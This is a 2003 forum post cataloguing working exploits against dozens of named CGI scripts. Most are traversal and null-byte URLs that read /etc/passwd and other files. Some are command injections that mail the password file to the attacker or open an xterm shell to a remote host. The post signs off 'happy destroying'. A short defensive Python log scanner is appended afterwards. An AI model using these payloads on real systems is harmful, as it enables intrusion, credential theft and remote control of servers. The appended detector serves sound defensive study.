A collection of CGI vulnerabilities


zAKoO LoRd
29-09-2003, 01:15
http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*
======================================================================
Example:

http://www.target.com/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/resolv.conf%00.html&passurl=/category/
======================================================================
Exploit:

To view their c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

======================================================================
Exploit:

http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?\
template=../../../../../../../../../../../../../../../../../../etc/passwd
======================================================================
Exploit:

telnet target.machine.com 80

GET /cfdocs/expelval/openfile.cfm HTTP/1.0
GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0

======================================================================
About : Commerce.cgi can have your store's catalog up
and running on the web in literally a couple
of hours. The easy to use Store Manager will
even allow you to add and remove products from
your inventory right through your web browser.
Best of all, it's free, vulnerable & open source.
Exploit:

lynx http://VULNERABLE.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
(take note of the "index.html" being added; it needs that)
======================================================================
Exploit:

lynx http://victim.com/scripts/convert.bas?../../etc/passwd

======================================================================
A standard Perl problem is in the statistics module, file hsx.cgi: the script does not filter ../ and %00. Through this bug you can remotely read any file and list directories. ../ means directory up; %00 is the hex symbol that means end of line.

Exploit:


lynx http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
======================================================================
Name : ikonboard
Problem: $inhelpon = $query -> param('helpon');

Exploit:

lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
======================================================================
http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
======================================================================
Name : PerlCal
About : cal_make.pl of the PerlCal script may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running as).

Exploit:

http://www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd%00
======================================================================
Exploit:

lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd'
======================================================================
DESCRIPTION

PHPix is a Web-based photo album viewer written in PHP. It features automatic
generation of thumbnails and different resolution files for viewing on the fly.
PHPix Photo Album is available from http://phpix.org

Synnergy has recently discovered a flaw within PHPix that allows a remote user to
traverse a directory as a request to the script using the
$mode=album&album=_some_dir_variable. It is then possible to read any file
or folder's contents with the privileges of the httpd.

Example:

http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
======================================================================
Exploit:

lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd

======================================================================
Exploit:
Affected program: PhotoAlbum v 0.9.9
Any user is able to pass a directory as a request
to the script; the script will read the directory
and output all files included in it that it has read
access to. For instance:

http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
======================================================================
Exploit:

lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
Try it with
Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3
======================================================================
Exploit:
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If sawmill is run as a cgi script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
======================================================================
Exploit:

http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
======================================================================
Exploit:

lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
======================================================================
Exploit:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display the /etc/passwd (if the webserver user has
access to this file).

Another URL can display the source of talkback.cgi itself
that contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed)
======================================================================
Exploit:

hax0r:/# telnet www.blah.net 80

Trying 200.xx.xx.xx...
Connected to www.blah.net
Escape character is '^]'.

GET /cgi-bin/test-cgi?*
======================================================================
Exploit:

'http://www.host.com/cgi-bin/view-source?../../../../../../../etc/passwd'
======================================================================
Exploit:

http://www.victim.org/cgi-bin/w3-msql/protected-dir/private-file

note: in this case, the intruder will have to already
know the structure of the directory. The second way:

http://www.victim.org/cgi-bin/w3-msql/protected-dir/.htpasswd

And then you use John The Ripper to decrypt the DES3 encrypted
passwords.
======================================================================
Name : "show files" vulnerability with Perl null byte bug.
About : Way-board is a popular Korean board
(http://way.co.kr - official site).
Problem: Through this bug you can see any files; the bug works
on every system where Perl is installed. "%00"
means the hex symbol of the end of the line, used in
C, C++ and Perl.

Exploit:

lynx http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
======================================================================
Exploit:
http://example.com/cgi-bin/Web_store/web_store.cgi?page=../../../../../../../../etc/passwd%00.html
======================================================================
Exploit:

jaxx0r:/# telnet www.xxxx.net 80

Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.

GET http://server/cgi-bin/wguest.exe?template=c:\boot.ini
======================================================================
SUMMARY
-------
The TalentSoft Web+ server allows users to read arbitrary data files on
the Web server running the webpsvr daemon. By entering a crafted URL any
user with a browser can retrieve files that the webpsvr daemon itself has
access to.

http://yourhost.com/cgi-bin/webplus?script=/../../../../etc/passwd

======================================================================
About : WebSPIRS is SilverPlatter's Information Retrieval
System for the World Wide Web (WWW). It is a common
gateway interface (CGI) application which allows any
forms-capable browser, such as Netscape, to search
SilverPlatter (SP) Electronic Reference Library (ERL)
databases available over the Internet.
http://www.silverplatter.com.
Problem: The problem lies in incorrect validation of user-submitted
(by-browser) information, which can show any file of the
system where the script is installed.

Exploit:

lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
======================================================================
Exploit:

http://sgi.victim/cgi-bin/wrap?/../../../../../etc

======================================================================
Exploit:


http://www.my_target.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
======================================================================
About : the script "HIS Auktion 1.62" is a catalog-of-links CGI
script. The creator's site: http://www.his-software.de
Problem: -------from auktion.pl-------
sub readfile {
local($filename)=$_[0];
local(@array);
open(f,$filename);
----------------------------
$filename is not filtered for special symbols.

Exploit:

lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id
======================================================================
Exploit:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
======================================================================
Name : remote command execution vulnerability
Problem: WebUtil - A collection of net commands by The
Puppet Master. A hole can lead to command execution
on remote server running this perl script.

Exploit:

Access these sites and type "|id|" in the "Web Name or IP Address:"
form field.
http://server/cgi-bin/webutil.pl?ping
http://server/cgi-bin/webutil.pl?traceroute
http://server/cgi-bin/webutil.pl?whois
http://server/cgi-bin/webutil.pl?finger
http://server/cgi-bin/webutil.pl?nslookup
http://server/cgi-bin/webutil.pl?host
http://server/cgi-bin/webutil.pl?dnsquery
http://server/cgi-bin/webutil.pl?calendar
This one, I think, gets you very important information.
======================================================================
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: 85 (replace 85 with length of the "exploit" line)

receiver=;mail+your_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

Don't worry if the server displays an error message. The password file is
on the way :).
Hahahaha, look what he tells you: don't worry about the error message that will appear to you. The password is on the way, my friend.
======================================================================
Exploit:

http://www.host.org/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh

======================================================================
Exploit:
http://www.htdig.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60
======================================================================
Exploit:

lynx www.host.com/cgi-bin/excite;IFS="$";/bin/cat /etc/passwd|mail your_email_here;
======================================================================

When moving this topic to another forum, please include the name of the topic's author... and thanks.
With my regards, happy destroying
Your brother....
zAKoO LoRd
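As an added example that is not part of zAKoO LoRd's post or of any of the products named in it, the script below looks at the same request shapes from the defender's side: it decodes request targets out of web-server access-log lines and flags the three patterns the post catalogues (../ traversal, %00 truncation, and shell metacharacter or newline injection). The log lines and the client IP are constructed to mirror the post's URLs.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines shaped like the post's own URLs (placeholder client IP).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2003:01:15:00 +0000] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 200 1843
10.0.0.5 - - [29/Sep/2003:01:15:01 +0000] "GET /Album/?mode=album&album=..%2F..%2F..%2F..%2Fetc&dispsize=640 HTTP/1.0" 200 512
10.0.0.5 - - [29/Sep/2003:01:15:02 +0000] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0" 200 77
10.0.0.5 - - [29/Sep/2003:01:15:03 +0000] "GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.0" 200 301
10.0.0.5 - - [29/Sep/2003:01:15:04 +0000] "GET /cgi-bin/commerce.cgi?page=index.html HTTP/1.0" 200 2048
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A ".." segment not glued to a preceding name (so "a..b/" is ignored), followed by a slash or the end.
TRAVERSAL_RE = re.compile(r'(?<![\w.])\.\.(?=/|$)')
# Characters that an unfiltered open()/system() in a Perl CGI passes straight to the shell:
# ';' '|' backtick, an injected newline (%0A) and $( ).
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(')

def normalize(target: str) -> str:
    """Decode path+query twice (so ..%252F collapses like ..%2F) and fold '\\' to '/'."""
    parts = urlsplit(target)
    return unquote(unquote(parts.path + "?" + parts.query)).replace("\\", "/")

def classify(target: str) -> set:
    """Return the set of attack patterns present in one request target."""
    decoded = normalize(target)  # path and query checked together: these scripts take a file name from either
    findings = set()
    if "\x00" in decoded:
        findings.add("null-byte")
    if TRAVERSAL_RE.search(decoded):
        findings.add("traversal")
    if SHELL_META_RE.search(decoded):
        findings.add("command-injection")
    return findings

def scan_log(text: str) -> list:
    """Return (target, sorted findings) for each request line matching at least one pattern."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (found := classify(m.group("target"))):
            hits.append((m.group("target"), sorted(found)))
    return hits

if __name__ == "__main__":
    for target, found in scan_log(SAMPLE_LOG):
        print(f"{', '.join(found):24} {target}")
```

Decoding twice is deliberate so that double-encoded variants are not missed, at the cost of treating a literal "%25" in a legitimate parameter as an escape.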